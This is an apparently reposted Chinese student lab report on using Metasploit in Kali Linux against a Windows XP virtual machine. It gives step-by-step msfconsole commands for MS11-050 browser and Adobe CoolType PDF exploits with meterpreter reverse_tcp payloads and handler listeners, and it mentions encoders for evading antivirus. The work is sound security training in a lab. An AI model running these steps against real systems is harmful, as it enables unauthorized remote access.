首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

Kali Linux实战篇:Metasploit framework渗透测试框架应用实战教程

本公众号【最全资料库】所有分享,仅限学习交流!请勿他用!

一、实验后回答问题

什么是exploit、payload、encode

Metasploit这种模块化的设计,大大提高了代码的复用率。exploit(渗透攻击模块)利用漏洞或者配置弱点对目标进行攻击,payload(攻击载荷模块)作为一种手段,exploit通过填入和运行攻击载荷,获得远程的访问权限。encode(编码器模块)是工具之一,也是渗透攻击的一重保障——避免坏字符、使攻击载荷免杀。这3个模块是渗透攻击的核心,相辅相成。

二、实验总结与体会

通过这次实验,我学会了修改kali的IP,然后就能ping通了

为了和别的同学做不同的主动攻击,下载了4、5个虚拟机,通过这次实验,我学会了在虚拟机中装XP系统。实验的成功与否,有很多不确定的因素,比如中英文版本啊,可能我下载的虚拟机事先打好了补丁啊(虽然它写着原始版和纯净版)

这次实验很有意思,系统漏洞不容小觑,稍加利用就能变成渗透攻击的手段。对渗透攻击有了更深入的了解,最后要立一个FLAG,改掉拖延症

三、实验过程记录

ms03_049、ms06_040主动攻击

大家都做ms08_067,想找一个和大家不一样的.查了一下WinXPSP3,除了这个漏洞,其他漏洞像拒绝服务漏洞、任意写入权限提升漏洞太难操作了。

尝试了ms03_049、ms_06_040(本来想做killbill,因为电影挺好看,然鹅并没有符合条件的靶机)

这里的靶机是Win XP Professional原版

输入msfconsole进入msf,search一下

进入该漏洞模块的使用(use exploit/windows/smb/ms03_049_netapi)

show payload,找到一个比如shell_reverse_tcp;show targets

设置攻击有效载荷(set payload generic/shell_reverse_tcp)、show options并设置相关数据

输入exploit开始攻击

建立不了联接?关闭防火墙试试?还是不行

又试了ms06_040

真的做了挺多回,本来以为召唤盾牌就能成功的,看到坦克依然不成功,就发现自己想的太简单

也没成功,希望老师不要扣分,我毕竟和大家的主动攻击不一样呀(O_O),连不通我也很绝望

IE浏览器渗透攻击——MS11050安全漏洞

开启msfconsole,输入use exploit/windows/browser/ms11_050_mshtml_cobjetelement

输入info查看信息:

设置对应的载荷set payload windows/meterpreter/reverese_tcp;

show options查看需要设置的相关信息:

设置相关信息:set LHOST ‘kali Ip’、 set LPORT 5337、 set URIPATH baidu

exploit,有靶机需要访问的ip地址:

在靶机IE上输入网址,并在靶机上查看信息。

可以看见kali中显示一个session 1已经创建;

输入命令sessions -i 1,开始连接,输入shell成功获取shell

Adobe阅读器渗透攻击

开启msfconsole、输入命令use exploit/windows/fileformat/adobe_cooltype_sing

使用命令set payload windows/meterpreter/reverse_tcp设置攻击有效载荷,show options

输入exploit,生成pdf文件,并可以看到pdf所在文件夹,将pdf复制到靶机里。

使用use exploit/multi/handler新建一个监听模块

使用set payload 建立一个反向连接,设置set LPORT 5337

使用命令exploit开始攻击,在xp中打开pdf。同时kali会显示连接成功的结果。

输入shell获取靶机信息

在靶机xp中使用命令netstat -an,看本地tcp连接

辅助模块

本来尝试了书上的“开放代理探测与应用”,但是run不起来

枚举系统上的用户

  • 发表于:
  • 原文链接https://kuaibao.qq.com/s/20190720A0PB7V00?refer=cp_1026
  • 腾讯「腾讯云开发者社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。
  • 如有侵权,请联系 cloudcommunity@tencent.com 删除。

扫码

添加站长 进交流群

领取专属 10元无门槛券

私享最新 技术干货

扫码加入开发者社群
领券